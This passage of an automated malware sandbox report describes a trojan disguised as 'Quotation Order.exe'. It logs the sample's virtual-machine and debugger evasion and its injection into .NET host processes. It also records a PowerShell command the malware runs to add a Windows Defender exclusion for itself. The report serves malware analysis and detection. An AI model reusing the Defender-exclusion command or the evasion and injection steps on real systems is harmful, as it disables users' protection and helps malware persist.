                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99671
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99123
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98997
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98651
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98317
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97405
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97296
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97076
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99868
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99244
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99137
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99017
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98782
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98658
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98298
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97704
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97579
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97454
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97329
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99884
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99778
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99553
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98704
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
                    Source: Amcache.hve.35.drBinary or memory string: VMware
                    Source: Quotation Order.exe, 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1482838005.00000153C05A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.1488978955.0000026BB4BCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMUP
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware ToolsP
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: Amcache.hve.35.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: svchost.exe, 00000024.00000002.2516165987.000002B804ED4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: svchost.exe, 00000005.00000002.2514862826.00000202B728E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: Amcache.hve.35.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.35.drBinary or memory string: vmci.sys
                    Source: svchost.exe, 00000005.00000002.2513844364.00000202B724E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: CasPol.exe, 00000038.00000002.2517527074.0000000003282000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREHS
                    Source: Amcache.hve.35.drBinary or memory string: VMware20,1
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sysP
                    Source: Amcache.hve.35.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.35.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.35.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.35.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.35.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.35.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: Amcache.hve.35.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.35.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.35.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREP
                    Source: svchost.exe, 00000024.00000002.2514904148.000002B804E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~
                    Source: svchost.exe, 00000005.00000002.2513550566.00000202B722B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: CasPol.exe, 00000038.00000002.2543008151.0000000006260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
                    Source: Amcache.hve.35.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.35.drBinary or memory string: VMware Virtual USB Mouse
                    Source: svchost.exe, 00000005.00000002.2514331338.00000202B7264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareP
                    Source: Amcache.hve.35.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.35.drBinary or memory string: VMware, Inc.
                    Source: svchost.exe, 00000005.00000002.2514513323.00000202B7281000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: Amcache.hve.35.drBinary or memory string: VMware20,1hbin@
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sysP
                    Source: Amcache.hve.35.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.35.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.35.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\P
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: Amcache.hve.35.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.35.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIP
                    Source: CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sysP
                    Source: svchost.exe, 00000011.00000002.1472279913.000001FCA7B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: Amcache.hve.35.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.35.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: svchost.exe, 00000005.00000002.2513550566.00000202B722B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: Amcache.hve.35.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: svchost.exe, 00000024.00000003.1399478264.000002B805C44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                    Source: Amcache.hve.35.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                    Source: AddInProcess32.exe, 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: svchost.exe, 00000005.00000002.2512648304.00000202B7202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                    Source: Amcache.hve.35.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: svchost.exe, 00000005.00000002.2513844364.00000202B724E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_011E70C8 CheckRemoteDebuggerPresent,26_2_011E70C8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\Quotation Order.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    .NET source code references suspicious native API functions
                    Source: Quotation Order.exe, -----.csReference to suspicious API methods: ((_065E)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(_FBCD_0670_FBC2_0600_FBD0(_FBBD_FBBF._0605_FDE4_FDEC_065C_FDE8_060A_06E8_FDE0)), _FBCD_0670_FBC2_0600_FBD0(_FBBD_FBBF._0616_0619)), typeof(_065E)))("vpGUntmDH2Bs", out var _)
                    Source: Quotation Order.exe, -----.csReference to suspicious API methods: ((_065E)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(_FBCD_0670_FBC2_0600_FBD0(_FBBD_FBBF._0605_FDE4_FDEC_065C_FDE8_060A_06E8_FDE0)), _FBCD_0670_FBC2_0600_FBD0(_FBBD_FBBF._0616_0619)), typeof(_065E)))("vpGUntmDH2Bs", out var _)
                    Source: Quotation Order.exe, -----.csReference to suspicious API methods: VirtualProtect(procAddress, (uint)array.Length, 64u, out var _FBC8_061A_FBCA_06E2)
                    Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, uRcQkDeJoO4.csReference to suspicious API methods: zHSk.OpenProcess(C6Nh1Wz8.DuplicateHandle, bInheritHandle: true, (uint)_4aIajlwkXEt2.ProcessID)
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: AA4008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 820008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
